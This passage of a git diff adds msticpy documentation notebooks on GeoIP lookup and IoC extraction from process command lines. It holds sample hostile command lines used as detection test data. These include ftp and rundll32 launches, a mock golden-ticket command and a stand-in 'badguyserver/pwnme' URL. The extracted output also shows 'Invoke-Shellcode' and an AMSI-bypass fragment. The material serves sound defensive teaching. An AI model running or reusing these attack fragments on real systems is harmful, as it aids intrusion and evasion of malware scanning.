+       "86      40.91.75.5          US  United States  Washington         None   \n",
+       "\n",
+       "    Longitude  Latitude   Asn edges         Type AdditionalData  \\\n",
+       "0    -78.3750   36.6534  None    {}  geolocation             {}   \n",
+       "1    -79.4195   43.6644  None    {}  geolocation             {}   \n",
+       "2    -79.4195   43.6644  None    {}  geolocation             {}   \n",
+       "3    -98.4926   29.4221  None    {}  geolocation             {}   \n",
+       "4    -93.6127   41.6015  None    {}  geolocation             {}   \n",
+       "..        ...       ...   ...   ...          ...            ...   \n",
+       "82   -78.3750   36.6534  None    {}  geolocation             {}   \n",
+       "83   -78.1539   38.7095  None    {}  geolocation             {}   \n",
+       "84   -78.1539   38.7095  None    {}  geolocation             {}   \n",
+       "85   -97.8220   37.7510  None    {}  geolocation             {}   \n",
+       "86  -122.3412   47.6032  None    {}  geolocation             {}   \n",
+       "\n",
+       "         IpAddress  \n",
+       "0     65.55.44.109  \n",
+       "1    13.71.172.128  \n",
+       "2    13.71.172.130  \n",
+       "3     40.124.45.19  \n",
+       "4    104.43.212.12  \n",
+       "..             ...  \n",
+       "82     20.41.41.23  \n",
+       "83    52.179.17.38  \n",
+       "84  157.55.134.142  \n",
+       "85  172.217.15.110  \n",
+       "86      40.91.75.5  \n",
+       "\n",
+       "[87 rows x 12 columns]"
+      ]
+     },
+     "execution_count": 10,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "import pandas as pd\n",
+    "netflow_df = pd.read_csv(\"data/az_net_flows.csv\")\n",
+    "netflow_df = netflow_df[[\"AllExtIPs\"]].drop_duplicates()\n",
+    "iplocation = GeoLiteLookup()\n",
+    "iplocation.df_lookup_ip(netflow_df, column=\"AllExtIPs\")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a></a>[Contents](#contents)\n",
+    "## Creating a Custom GeopIP Lookup Class\n",
+    "\n",
+    "You can derive a class that implements the same operations to use with a different GeoIP service.\n",
+    "\n",
+    "The class signature is as follows:\n",
+    "```\n",
+    "class GeoIpLookup(ABC):\n",
+    "    \"\"\"Abstract base class for GeoIP Lookup classes.\"\"\"\n",
+    "\n",
+    "    @abstractmethod\n",
+    "    def lookup_ip(self, ip_address: str = None, ip_addr_list: Iterable = None,\n",
+    "                  ip_entity: IpAddress = None):\n",
+    "        \"\"\"\n",
+    "        Lookup IP location.\n",
+    "\n",
+    "        Keyword Arguments:\n",
+    "            ip_address {str} -- a single address to look up (default: {None})\n",
+    "            ip_addr_list {Iterable} -- a collection of addresses to lookup (default: {None})\n",
+    "            ip_entity {IpAddress} -- an IpAddress entity\n",
+    "\n",
+    "        Returns:\n",
+    "            tuple(list{dict}, list{entity}) -- returns raw geolocation results and\n",
+    "                same results as IP/Geolocation entities\n",
+    "\n",
+    "        \"\"\"\n",
+    "```\n",
+    "You should override the lookup_ip method implementing your own method of geoip lookup."
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a></a>[Contents](#contents)\n",
+    "## Calculating Geographical Distances\n",
+    "\n",
+    "Use the geo_distance function from msticpy.sectools.geoip to calculated distances between two locations.\n",
+    "I am indebted to Martin Thoma who posted this solution (which I've modified slightly) on Stackoverflow.\n",
+    "\n",
+    "\n",
+    "```\n",
+    "Signature: geo_distance(origin: Tuple[float, float], destination: Tuple[float, float]) -&gt; float\n",
+    "Docstring:\n",
+    "Calculate the Haversine distance.\n",
+    "\n",
+    "Author: Martin Thoma - stackoverflow\n",
+    "\n",
+    "Parameters\n",
+    "----------\n",
+    "origin : tuple of float\n",
+    "    (lat, long)\n",
+    "destination : tuple of float\n",
+    "    (lat, long)\n",
+    "\n",
+    "Returns\n",
+    "-------\n",
+    "distance_in_km : float\n",
+    "```\n",
+    "\n",
+    "\n",
+    "Or where you have source and destination IpAddress entities, you can use the wrapper entity_distance.\n",
+    "```\n",
+    "Signature:\n",
+    "entity_distance(\n",
+    "    ['ip_src: msticpy.nbtools.entityschema.IpAddress', 'ip_dest: msticpy.nbtools.entityschema.IpAddress'],\n",
+    ") -&gt; float\n",
+    "Docstring:\n",
+    "Return distance between two IP Entities.\n",
+    "\n",
+    "Arguments:\n",
+    "    ip_src {IpAddress} -- Source IpAddress Entity\n",
+    "    ip_dest {IpAddress} -- Destination IpAddress Entity\n",
+    "\n",
+    "Raises:\n",
+    "    AttributeError -- if either entity has no location information\n",
+    "\n",
+    "Returns:\n",
+    "    float -- Distance in kilometers.\n",
+    "```"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 11,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-02-08T02:38:55.326316Z",
+     "start_time": "2020-02-08T02:38:55.319320Z"
+    }
+   },
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "{ 'AdditionalData': {},\n",
+      "  'Address': '90.156.201.97',\n",
+      "  'Location': { 'AdditionalData': {},\n",
+      "                'CountryCode': 'RU',\n",
+      "                'CountryName': 'Russia',\n",
+      "                'Latitude': 55.7386,\n",
+      "                'Longitude': 37.6068,\n",
+      "                'Type': 'geolocation',\n",
+      "                'edges': set()},\n",
+      "  'ThreatIntelligence': [],\n",
+      "  'Type': 'ipaddress',\n",
+      "  'edges': set()}\n",
+      "{ 'AdditionalData': {},\n",
+      "  'Address': '151.101.64.223',\n",
+      "  'Location': { 'AdditionalData': {},\n",
+      "                'CountryCode': 'US',\n",
+      "                'CountryName': 'United States',\n",
+      "                'Latitude': 37.751,\n",
+      "                'Longitude': -97.822,\n",
+      "                'Type': 'geolocation',\n",
+      "                'edges': set()},\n",
+      "  'ThreatIntelligence': [],\n",
+      "  'Type': 'ipaddress',\n",
+      "  'edges': set()}\n",
+      "\n",
+      "Distance between IP Locations = 8796.8km\n"
+     ]
+    }
+   ],
+   "source": [
+    "from msticpy.sectools.geoip import geo_distance\n",
+    "_, ip_entity1 = iplocation.lookup_ip(ip_address='90.156.201.97')\n",
+    "_, ip_entity2 = iplocation.lookup_ip(ip_address='151.101.64.223')\n",
+    "\n",
+    "print(ip_entity1[0])\n",
+    "print(ip_entity2[0])\n",
+    "dist = geo_distance(origin=(ip_entity1[0].Location.Latitude, ip_entity1[0].Location.Longitude),\n",
+    "                    destination=(ip_entity2[0].Location.Latitude, ip_entity2[0].Location.Longitude))\n",
+    "print(f'\\nDistance between IP Locations = {round(dist, 1)}km')"
+   ]
+  }
+ ],
+ "metadata": {
+  "celltoolbar": "Tags",
+  "hide_input": false,
+  "kernelspec": {
+   "display_name": "Python (condadev)",
+   "language": "python",
+   "name": "condadev"
+  },
+  "language_info": {
+   "codemirror_mode": {
+    "name": "ipython",
+    "version": 3
+   },
+   "file_extension": ".py",
+   "mimetype": "text/x-python",
+   "name": "python",
+   "nbconvert_exporter": "python",
+   "pygments_lexer": "ipython3",
+   "version": "3.7.9"
+  },
+  "latex_envs": {
+   "LaTeX_envs_menu_present": true,
+   "autoclose": false,
+   "autocomplete": true,
+   "bibliofile": "biblio.bib",
+   "cite_by": "apalike",
+   "current_citInitial": 1,
+   "eqLabelWithNumbers": true,
+   "eqNumInitial": 1,
+   "hotkeys": {
+    "equation": "Ctrl-E",
+    "itemize": "Ctrl-I"
+   },
+   "labels_anchors": false,
+   "latex_user_defs": false,
+   "report_style_numbering": false,
+   "user_envs_cfg": false
+  },
+  "toc": {
+   "base_numbering": 1,
+   "nav_menu": {
+    "height": "318.996px",
+    "width": "320.994px"
+   },
+   "number_sections": false,
+   "sideBar": true,
+   "skip_h1_title": false,
+   "title_cell": "Table of Contents",
+   "title_sidebar": "Contents",
+   "toc_cell": false,
+   "toc_position": {
+    "height": "calc(100% - 180px)",
+    "left": "10px",
+    "top": "150px",
+    "width": "165px"
+   },
+   "toc_section_display": true,
+   "toc_window_display": true
+  },
+  "varInspector": {
+   "cols": {
+    "lenName": 16,
+    "lenType": 16,
+    "lenVar": 40
+   },
+   "kernels_config": {
+    "python": {
+     "delete_cmd_postfix": "",
+     "delete_cmd_prefix": "del ",
+     "library": "var_list.py",
+     "varRefreshCmd": "print(var_dic_list())"
+    },
+    "r": {
+     "delete_cmd_postfix": ") ",
+     "delete_cmd_prefix": "rm(",
+     "library": "var_list.r",
+     "varRefreshCmd": "cat(var_dic_list()) "
+    }
+   },
+   "position": {
+    "height": "406.193px",
+    "left": "1468.4px",
+    "right": "20px",
+    "top": "120px",
+    "width": "456.572px"
+   },
+   "types_to_exclude": [
+    "module",
+    "function",
+    "builtin_function_or_method",
+    "instance",
+    "_Feature"
+   ],
+   "window_display": false
+  },
+  "widgets": {
+   "application/vnd.jupyter.widget-state+json": {
+    "state": {},
+    "version_major": 2,
+    "version_minor": 0
+   }
+  }
+ },
+ "nbformat": 4,
+ "nbformat_minor": 4
+}
diff --git a/docs/notebooks/IoCExtract.ipynb b/docs/notebooks/IoCExtract.ipynb
new file mode 100644
index 000000000..10d6063d8
--- /dev/null
+++ b/docs/notebooks/IoCExtract.ipynb
@@ -0,0 +1,2170 @@
+{
+ "cells": [
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# Title: msticpy - IoC Extraction\n",
+    "## Description:\n",
+    "This class allows you to extract IoC patterns from a string or a DataFrame.\n",
+    "Several patterns are built in to the class and you can override these or supply new ones.\n",
+    "\n",
+    "You must have msticpy installed to run this notebook:\n",
+    "```\n",
+    "%pip install --upgrade msticpy\n",
+    "```\n"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a id='toc'></a>\n",
+    "## Table of Contents\n",
+    "- [Looking for IoC in a String](#cmdlineiocs)\n",
+    "- [Search DataFrame for IoCs](#dataframeiocs)\n",
+    "- [IoCExtractor API](#iocextractapi)\n",
+    "  - [Predefined Regex Patterns](#regexpatterns)\n",
+    "  - [Adding your own pattern(s)](#addingpatterns)\n",
+    "  - [extract() method](#extractmethod)\n",
+    "  - [Merge the results with the input DataFrame](#mergeresults)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 1,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-02-10T19:52:15.548645Z",
+     "start_time": "2020-02-10T19:52:11.878710Z"
+    },
+    "scrolled": true
+   },
+   "outputs": [],
+   "source": [
+    "# Imports\n",
+    "import sys\n",
+    "MIN_REQ_PYTHON = (3,6)\n",
+    "if sys.version_info < MIN_REQ_PYTHON:\n",
+    "    print('Check the Kernel->Change Kernel menu and ensure that Python 3.6')\n",
+    "    print('or later is selected as the active kernel.')\n",
+    "    sys.exit(\"Python %s.%s or later is required.\\n\" % MIN_REQ_PYTHON)\n",
+    "\n",
+    "from IPython import get_ipython\n",
+    "from IPython.display import display, HTML\n",
+    "\n",
+    "import matplotlib.pyplot as plt\n",
+    "import pandas as pd\n",
+    "pd.set_option('display.max_rows', 500)\n",
+    "pd.set_option('display.max_columns', 50)\n",
+    "pd.set_option('display.max_colwidth', 100)\n"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 2,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-02-10T19:52:15.564615Z",
+     "start_time": "2020-02-10T19:52:15.549645Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>CommandLine</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>.\\ftp  -s:C:\\RECYCLER\\xxppyy.exe</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>.\\reg  not /domain:everything that /sid:shines is /krbtgt:golden !</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>cmd  /c \"systeminfo &amp;&amp; systeminfo\"</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>.\\rundll32  /C 42424.exe</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>.\\rundll32  /C c:\\users\\MSTICAdmin\\42424.exe</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                                                          CommandLine\n",
+       "0                                    .\\ftp  -s:C:\\RECYCLER\\xxppyy.exe\n",
+       "1  .\\reg  not /domain:everything that /sid:shines is /krbtgt:golden !\n",
+       "2                                  cmd  /c \"systeminfo && systeminfo\"\n",
+       "3                                            .\\rundll32  /C 42424.exe\n",
+       "4                        .\\rundll32  /C c:\\users\\MSTICAdmin\\42424.exe"
+      ]
+     },
+     "execution_count": 2,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "# Load test data\n",
+    "process_tree = pd.read_csv('data/process_tree.csv')\n",
+    "process_tree[['CommandLine']].head()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a id='cmdlineiocs'></a>[Contents](#toc)\n",
+    "## Looking for IoC in a String\n",
+    "Here we:\n",
+    "- Get a commandline from our data set.\n",
+    "- Pass it to the IoC Extractor\n",
+    "- View the results"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 3,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-02-10T19:52:15.572611Z",
+     "start_time": "2020-02-10T19:52:15.566613Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "'netsh  start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\\\\\\\\Users\\\\\\\\user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\bzzzzzz.txt'"
+      ]
+     },
+     "execution_count": 3,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "# get a commandline from our data set\n",
+    "cmdline = process_tree['CommandLine'].loc[78]\n",
+    "cmdline"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 4,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-02-10T19:52:17.266509Z",
+     "start_time": "2020-02-10T19:52:15.573611Z"
+    }
+   },
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "\n",
+      "Potential IoCs found in alert process:\n"
+     ]
+    },
+    {
+     "data": {
+      "text/plain": [
+       "defaultdict(set,\n",
+       "            {'ipv4': {'1.2.3.4'},\n",
+       "             'windows_path': {'C:\\\\\\\\Users\\\\\\\\user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\bzzzzzz.txt'}})"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "# Instantiate an IoCExtract object\n",
+    "from msticpy.sectools import IoCExtract\n",
+    "ioc_extractor = IoCExtract()\n",
+    "\n",
+    "# any IoCs in the string?\n",
+    "iocs_found = ioc_extractor.extract(cmdline)\n",
+    "    \n",
+    "if iocs_found:\n",
+    "    print('\\nPotential IoCs found in alert process:')\n",
+    "    display(iocs_found)\n"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a id='dataframeiocs'></a>[Contents](#toc)\n",
+    "## If we have a DataFrame, look for IoCs in the whole data set\n",
+    "You can replace the ```data=``` parameter to ioc_extractor.extract() to pass other data frames.\n",
+    "Use the ```columns``` parameter to specify which column or columns that you want to search."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 5,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-02-10T19:52:17.305487Z",
+     "start_time": "2020-02-10T19:52:17.267508Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<h3>IoC patterns found in process tree.</h3>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>IoCType</th>\n",
+       "      <th>Observable</th>\n",
+       "      <th>SourceIndex</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>microsoft.com</td>\n",
+       "      <td>24</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>url</td>\n",
+       "      <td>http://server/file.sct</td>\n",
+       "      <td>31</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>server</td>\n",
+       "      <td>31</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>evil.ps</td>\n",
+       "      <td>35</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>url</td>\n",
+       "      <td>http://somedomain/best-kitten-names-1.jpg'</td>\n",
+       "      <td>37</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>5</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>somedomain</td>\n",
+       "      <td>37</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>6</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>blah.ps</td>\n",
+       "      <td>40</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>7</th>\n",
+       "      <td>md5_hash</td>\n",
+       "      <td>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</td>\n",
+       "      <td>40</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>8</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>blah.ps</td>\n",
+       "      <td>41</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>9</th>\n",
+       "      <td>md5_hash</td>\n",
+       "      <td>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</td>\n",
+       "      <td>41</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>10</th>\n",
+       "      <td>md5_hash</td>\n",
+       "      <td>81ed03caf6901e444c72ac67d192fb9c</td>\n",
+       "      <td>44</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>11</th>\n",
+       "      <td>url</td>\n",
+       "      <td>http://badguyserver/pwnme</td>\n",
+       "      <td>46</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>12</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>badguyserver</td>\n",
+       "      <td>46</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>13</th>\n",
+       "      <td>url</td>\n",
+       "      <td>http://badguyserver/pwnme</td>\n",
+       "      <td>47</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>14</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>badguyserver</td>\n",
+       "      <td>47</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>15</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>Invoke-Shellcode.ps</td>\n",
+       "      <td>48</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>16</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>Invoke-ReverseDnsLookup.ps</td>\n",
+       "      <td>49</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>17</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>Wscript.Shell</td>\n",
+       "      <td>67</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>18</th>\n",
+       "      <td>url</td>\n",
+       "      <td>http://system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').se...</td>\n",
+       "      <td>77</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>19</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').setvalue(...</td>\n",
+       "      <td>77</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>20</th>\n",
+       "      <td>ipv4</td>\n",
+       "      <td>1.2.3.4</td>\n",
+       "      <td>78</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>21</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>wscript.shell</td>\n",
+       "      <td>81</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>22</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>abc.com</td>\n",
+       "      <td>90</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>23</th>\n",
+       "      <td>ipv4</td>\n",
+       "      <td>127.0.0.1</td>\n",
+       "      <td>102</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>24</th>\n",
+       "      <td>url</td>\n",
+       "      <td>http://127.0.0.1/</td>\n",
+       "      <td>102</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "     IoCType  \\\n",
+       "0        dns   \n",
+       "1        url   \n",
+       "2        dns   \n",
+       "3        dns   \n",
+       "4        url   \n",
+       "5        dns   \n",
+       "6        dns   \n",
+       "7   md5_hash   \n",
+       "8        dns   \n",
+       "9   md5_hash   \n",
+       "10  md5_hash   \n",
+       "11       url   \n",
+       "12       dns   \n",
+       "13       url   \n",
+       "14       dns   \n",
+       "15       dns   \n",
+       "16       dns   \n",
+       "17       dns   \n",
+       "18       url   \n",
+       "19       dns   \n",
+       "20      ipv4   \n",
+       "21       dns   \n",
+       "22       dns   \n",
+       "23      ipv4   \n",
+       "24       url   \n",
+       "\n",
+       "                                                                                             Observable  \\\n",
+       "0                                                                                         microsoft.com   \n",
+       "1                                                                                http://server/file.sct   \n",
+       "2                                                                                                server   \n",
+       "3                                                                                               evil.ps   \n",
+       "4                                                            http://somedomain/best-kitten-names-1.jpg'   \n",
+       "5                                                                                            somedomain   \n",
+       "6                                                                                               blah.ps   \n",
+       "7                                                                      aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa   \n",
+       "8                                                                                               blah.ps   \n",
+       "9                                                                      aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa   \n",
+       "10                                                                     81ed03caf6901e444c72ac67d192fb9c   \n",
+       "11                                                                            http://badguyserver/pwnme   \n",
+       "12                                                                                         badguyserver   \n",
+       "13                                                                            http://badguyserver/pwnme   \n",
+       "14                                                                                         badguyserver   \n",
+       "15                                                                                  Invoke-Shellcode.ps   \n",
+       "16                                                                           Invoke-ReverseDnsLookup.ps   \n",
+       "17                                                                                        Wscript.Shell   \n",
+       "18  http://system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').se...   \n",
+       "19  system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').setvalue(...   \n",
+       "20                                                                                              1.2.3.4   \n",
+       "21                                                                                        wscript.shell   \n",
+       "22                                                                                              abc.com   \n",
+       "23                                                                                            127.0.0.1   \n",
+       "24                                                                                    http://127.0.0.1/   \n",
+       "\n",
+       "    SourceIndex  \n",
+       "0            24  \n",
+       "1            31  \n",
+       "2            31  \n",
+       "3            35  \n",
+       "4            37  \n",
+       "5            37  \n",
+       "6            40  \n",
+       "7            40  \n",
+       "8            41  \n",
+       "9            41  \n",
+       "10           44  \n",
+       "11           46  \n",
+       "12           46  \n",
+       "13           47  \n",
+       "14           47  \n",
+       "15           48  \n",
+       "16           49  \n",
+       "17           67  \n",
+       "18           77  \n",
+       "19           77  \n",
+       "20           78  \n",
+       "21           81  \n",
+       "22           90  \n",
+       "23          102  \n",
+       "24          102  "
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "ioc_extractor = IoCExtract()\n",
+    "ioc_df = ioc_extractor.extract(data=process_tree, columns=['CommandLine'])\n",
+    "if len(ioc_df):\n",
+    "    display(HTML(\"<h3>IoC patterns found in process tree.</h3>\"))\n",
+    "    display(ioc_df)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a id='iocextractapi'></a>[Contents](#toc)\n",
+    "## IoCExtractor API\n"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 6,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-02-10T19:52:17.359499Z",
+     "start_time": "2020-02-10T19:52:17.306509Z"
+    }
+   },
+   "outputs": [],
+   "source": [
+    "# IoCExtract docstring\n",
+    "ioc_extractor.extract?\n"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a id='regexpatterns'></a>[Contents](#toc)\n",
+    "### Predefined Regex Patterns"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 7,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-02-10T19:52:17.384441Z",
+     "start_time": "2020-02-10T19:52:17.361477Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<b>ipv4</b>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div style=\"margin-left:20px\"><pre>(?P&lt;ipaddress&gt;(?:[0-9]{1,3}\\.){3}[0-9]{1,3})</pre></div>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<b>ipv6</b>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div style=\"margin-left:20px\"><pre>(?&lt;![:.\\w])(?:[A-F0-9]{1,4}:){7}[A-F0-9]{1,4}(?![:.\\w])</pre></div>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<b>dns</b>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div style=\"margin-left:20px\"><pre>((?=[a-z0-9-]{1,63}\\.)[a-z0-9]+(-[a-z0-9]+)*\\.){1,126}[a-z]{2,63}</pre></div>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<b>url</b>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div style=\"margin-left:20px\"><pre>(?P&lt;protocol&gt;(https?|ftp|telnet|ldap|file)://)\n",
+       "            (?P&lt;userinfo&gt;([a-z0-9-._~!$&amp;\\&#x27;()*+,;=:]|%[0-9A-F]{2})*@)?\n",
+       "            (?P&lt;host&gt;([a-z0-9-._~!$&amp;\\&#x27;()*+,;=]|%[0-9A-F]{2})*)\n",
+       "            (:(?P&lt;port&gt;\\d*))?\n",
+       "            (/(?P&lt;path&gt;([^?\\#&quot;&lt;&gt;\\s]|%[0-9A-F]{2})*/?))?\n",
+       "            (\\?(?P&lt;query&gt;([a-z0-9-._~!$&amp;&#x27;()*+,;=:/?@]|%[0-9A-F]{2})*))?\n",
+       "            (\\#(?P&lt;fragment&gt;([a-z0-9-._~!$&amp;&#x27;()*+,;=:/?@]|%[0-9A-F]{2})*))?</pre></div>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<b>windows_path</b>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div style=\"margin-left:20px\"><pre>(?P&lt;root&gt;[a-z]:|\\\\\\\\[a-z0-9_.$-]+||[.]+)\n",
+       "            (?P&lt;folder&gt;\\\\(?:[^\\/:*?&quot;\\&#x27;&lt;&gt;|\\r\\n]+\\\\)*)\n",
+       "            (?P&lt;file&gt;[^\\\\/*?&quot;&quot;&lt;&gt;|\\r\\n ]+)</pre></div>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
